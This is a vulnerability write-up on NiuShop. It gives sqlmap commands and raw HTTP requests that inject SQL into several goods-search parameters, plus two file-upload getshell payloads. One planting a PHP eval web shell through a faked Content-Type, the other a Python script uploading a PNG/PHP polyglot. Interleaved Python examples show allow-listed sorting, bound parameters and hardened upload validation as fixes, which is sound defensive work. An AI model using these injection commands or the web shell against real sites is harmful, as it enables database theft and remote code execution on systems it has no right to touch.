SQL Injection

Injection 1

sqlmap -u "http://www.safeinfo.me/index.php/wap/goods/getGoodsListByConditions?category_id=1&brand_id=2&min_price=3&max_price=4&page=5&page_size=6&order=7&attr_array[][2]=8*&spec_array[]=9" --random-agent --batch --dbms "mysql"

Injection 2

sqlmap -u "http://www.safeinfo.me/index.php?s=/wap/Goods/promotionZone&group_id=*&page=1" --random-agent --batch --dbms "mysql"

Multi-user injection

POST /index.php?s=/wap/Goods/goodsSearchList HTTP/1.1
Host: 172.16.209.129:8086
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.16.209.129:8086/index.php/wap/goods/goodsSearchList
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 66
Cookie: PHPSESSID=uolpfnofnhcmdnamo55d883bk4; admin_type=1; workspaceParamSupplier=index%7CGoods; CNZZDATA009=30037667-1536735
Connection: close
Cache-Control: max-age=0

sear_name=&sear_type=1&order=*&sort=asc&controlType=&shop_id=0&page=1

Save the request as 1.txt

sqlmap -r 1.txt --random-agent --batch --dbms "mysql"
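All three injection points above sit in parameters that end up in a goods query: an array element (`attr_array[][2]`), a plain id (`group_id`) and a sort field (`order`). An `ORDER BY` column cannot be bound as a prepared-statement parameter, so the fix on the server side is an allow-list for the sort value plus bound parameters for everything else, validated element by element for array-style inputs. The following is an added example, not NiuShop code, written against a constructed SQLite `goods` table; the column names, the allow-list keys and the `search_goods` helper are assumptions made for the demonstration.

```python
import re
import sqlite3

# Allow-list for the user-facing "order" parameter: the user never supplies SQL,
# only a key that maps to a fixed ORDER BY fragment (keys are assumptions).
ALLOWED_ORDER = {
    "price_asc": "price ASC",
    "price_desc": "price DESC",
    "sales": "sales DESC",
}


def parse_int_list(values):
    """Validate a PHP-style array parameter (e.g. attr_array[]) element by element.

    Rejects anything that is not a short decimal integer, so "8*", "1 OR 1=1"
    and similar probe values never reach the query builder.
    """
    out = []
    for v in values:
        if not re.fullmatch(r"\d{1,9}", str(v)):
            raise ValueError("rejected non-integer array element: %r" % (v,))
        out.append(int(v))
    return out


def build_goods_query(params):
    """Return (sql, bindings). Every user value is either bound or allow-listed."""
    category_id = parse_int_list([params.get("category_id", "0")])[0]
    attr_ids = parse_int_list(params.get("attr_array", []))
    order = params.get("order", "sales")
    if order not in ALLOWED_ORDER:
        raise ValueError("rejected order value: %r" % (order,))
    sql = "SELECT id, name, price FROM goods WHERE category_id = ?"
    bindings = [category_id]
    if attr_ids:
        # one placeholder per element; the values themselves are bound, not concatenated
        sql += " AND attr_id IN (%s)" % ",".join("?" * len(attr_ids))
        bindings.extend(attr_ids)
    sql += " ORDER BY " + ALLOWED_ORDER[order]  # fixed fragment from the allow-list
    return sql, bindings


def is_rejected(params):
    """True when the validator refuses the request (used to show injection probes failing)."""
    try:
        build_goods_query(params)
    except ValueError:
        return True
    return False


def search_goods(params):
    """Run the validated query against a constructed in-memory goods table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE goods (id INTEGER, name TEXT, price REAL,"
        " category_id INTEGER, attr_id INTEGER, sales INTEGER)"
    )
    conn.executemany("INSERT INTO goods VALUES (?,?,?,?,?,?)", [
        (1, "mug", 5.0, 1, 8, 100),   # constructed sample rows
        (2, "cup", 7.5, 1, 9, 50),
        (3, "pot", 20.0, 2, 8, 10),
    ])
    sql, bindings = build_goods_query(params)
    rows = conn.execute(sql, bindings).fetchall()
    conn.close()
    return rows


if __name__ == "__main__":
    print(search_goods({"category_id": "1", "attr_array": ["8", "9"], "order": "price_desc"}))
    print(is_rejected({"category_id": "1", "order": "1 AND 1=1"}))
    print(is_rejected({"category_id": "1", "attr_array": ["8*"]}))
```

The same shape applies to the ThinkPHP code behind these endpoints: whatever the framework's query builder offers for binding, the sort field still has to go through a map like `ALLOWED_ORDER`, because `order('...')` with raw user input is exactly what `order=*` is probing for.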

Front-end Getshell

Getshell 1

POST /niushop/index.php?s=/components/imgupload HTTP/1.1
Host: 192.168.43.2
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------8057819217448682651318751492
Content-Length: 243
Referer: http://www.safeinfo.me/niushop/index.php?s=/member/reviewcommodity&orderid=2
Cookie: PHPSESSID=u1q2u693pj81c1tkaqjomb5qm0
Connection: close
Upgrade-Insecure-Requests: 1
-----------------------------8057819217448682651318751492
Content-Disposition: form-data; name="imgPhoto"; filename="11.php"
Content-Type: text/php // change to image/jpg, image/png, image/gif or another type
<?php @eval($_POST['1']) ?>
-----------------------------8057819217448682651318751492--

Getshell 2

import requests

session = requests.Session()

paramsGet = {"s":"/wap/upload/photoalbumupload"}
paramsPost = {"file_path":"upload/goods/","album_id":"30","type":"1,2,3,4"}
paramsMultipart = [('file_upload', ('themin.php', "\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\x00\x01\x00\x00\x00\x01\x08\x06\x00\x00\x00\x1f\x15\xc4\x89\x00\x00\x00\x0bIDAT\x08\x99c\xf8\x0f\x04\x00\x09\xfb\x03\xfd\xe3U\xf2\x9c\x00\x00\x00\x00IEND\xaeB`\x82<? php phpinfo(); ?>", 'application/octet-stream'))]
headers = {"Accept":"application/json, text/javascript, */*; q=0.01","X-Requested-With":"XMLHttpRequest","User-Agent":"Mozilla/5.0 (Android 9.0; Mobile; rv:61.0) Gecko/61.0 Firefox/61.0","Referer":"http://127.0.0.1/index.php?s=/admin/goods/addgoods","Connection":"close","Accept-Language":"en","Accept-Encoding":"gzip, deflate"}
cookies = {"action":"finish"}
response = session.post("http://127.0.0.1/index.php", data=paramsPost, files=paramsMultipart, params=paramsGet, headers=headers, cookies=cookies)

print("Status code: %i" % response.status_code)
print("Response body: %s" % response.content)
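The two upload cases fail for different reasons: Getshell 1 passes because the server trusts the client-supplied `Content-Type` header, and Getshell 2 passes because the server checks only the PNG magic bytes, which a polyglot (valid PNG header followed by PHP) satisfies. The check below is an added example, not NiuShop code, that shows both weak patterns next to a hardened validator; the sample files are constructed inline and the allow-list and function names are assumptions for the demonstration.

```python
import re

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
JPEG_MAGIC = b"\xff\xd8\xff"
GIF_MAGIC = (b"GIF87a", b"GIF89a")
ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}
# PHP open tags in any form: "<?php", "<?=", or short tag "<?" followed by whitespace
PHP_TAG = re.compile(rb"<\?(php\b|=|\s)", re.IGNORECASE)

# Constructed samples: a minimal "image" with a PNG header, and the same bytes
# with a PHP tag appended (the polyglot shape used in Getshell 2).
LEGIT_PNG = PNG_MAGIC + b"\x00" * 16
POLYGLOT_PNG = LEGIT_PNG + b"<?php TEST ?>"


def weak_check(filename, declared_content_type, data):
    """Getshell 1 pattern: trusting the client's Content-Type header."""
    return declared_content_type.startswith("image/")


def magic_only_check(filename, declared_content_type, data):
    """Getshell 2 pattern: magic bytes alone, which a PNG/PHP polyglot passes."""
    return data.startswith((PNG_MAGIC, JPEG_MAGIC) + GIF_MAGIC)


def hardened_check(filename, declared_content_type, data):
    """Return (accepted, reason). The declared Content-Type is deliberately ignored."""
    name = filename.replace("\\", "/").rsplit("/", 1)[-1]
    # 1. exactly one extension, from the allow-list (blocks 11.php and x.php.png)
    if name.count(".") != 1:
        return False, "filename must have exactly one extension"
    ext = name.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED_EXT:
        return False, "extension .%s not allowed" % ext
    # 2. magic bytes must match the claimed extension
    expected = {"png": (PNG_MAGIC,), "jpg": (JPEG_MAGIC,),
                "jpeg": (JPEG_MAGIC,), "gif": GIF_MAGIC}[ext]
    if not data.startswith(expected):
        return False, "magic bytes do not match extension"
    # 3. reject embedded PHP tags anywhere in the body (polyglot)
    if PHP_TAG.search(data):
        return False, "embedded PHP tag"
    return True, "ok"


if __name__ == "__main__":
    print(weak_check("11.php", "image/jpeg", b"<?php TEST ?>"))          # True: header trusted
    print(magic_only_check("themin.php", "application/octet-stream", POLYGLOT_PNG))  # True: magic only
    print(hardened_check("11.php", "image/jpeg", b"<?php TEST ?>"))
    print(hardened_check("themin.php", "application/octet-stream", POLYGLOT_PNG))
    print(hardened_check("pic.png", "application/octet-stream", LEGIT_PNG))
```

Tag scanning is a last line of defence, not the main one: the durable fixes are storing uploads under a server-generated name outside the web root (or on a path where PHP execution is disabled) and re-encoding the image with an image library so that trailing bytes are discarded. The extension rule here also rejects double extensions, since which suffix the web server honours depends on its handler configuration.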

That's all for now.